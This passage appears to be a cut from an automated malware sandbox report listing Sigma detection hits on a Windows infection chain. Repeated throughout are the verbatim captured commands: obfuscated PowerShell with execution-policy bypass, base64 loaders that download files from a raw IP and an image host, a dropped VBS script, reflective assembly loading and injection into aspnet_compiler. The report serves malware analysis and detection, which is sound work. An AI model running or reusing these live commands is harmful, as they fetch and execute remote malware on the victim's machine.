'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJ
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , ProcessId: 3780, ProcessName: wscript.exe
                      Sigma detected: AspNetCompiler Execution
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6364, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7380, ProcessName: aspnet_compiler.exe
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", ProcessId: 6884, ProcessName: csc.exe
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6772, TargetFilename: C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , ProcessId: 3780, ProcessName: wscript.exe
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6772, TargetFilename: C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", CommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgI

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTklo